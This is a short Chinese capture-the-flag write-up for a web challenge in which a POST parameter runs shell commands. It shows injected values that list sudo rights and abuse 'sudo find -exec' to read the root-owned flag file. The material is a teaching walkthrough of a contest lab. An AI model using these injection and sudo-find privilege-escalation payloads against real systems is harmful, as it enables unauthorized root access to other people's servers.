findme（web）

参考：杭州师范大学第四届网络与信息安全竞赛官方

参考知识：find命令提权以及反弹shell复现_find提权_白冷的博客-CSDN博客

打开题目后发现要求我们用post方式传入一个shit

随便传入一个数试一下，发现显示执行这个文件没有找到命令所在的绝对路径

输入 shit=/usr/bin/ls 所以我们使用绝对路径来执行他，并且发现有一些命令不存在

输入 shit=/usr/bin/sudo -l 我们用sudo去查询的时候，发现有一个find命令是在root权限下的无密码执行的

直接find命令执行

#命令解释： 以find 命令 执行 命令。

# find (一个路径或文件必须存在) -exec 执行命令 （结束）\;

输入shit=/usr/bin/sudo find /flag -exec \; 执行成功

输入shit=/usr/bin/sudo find /flag -exec cat /f* \; cat flag即可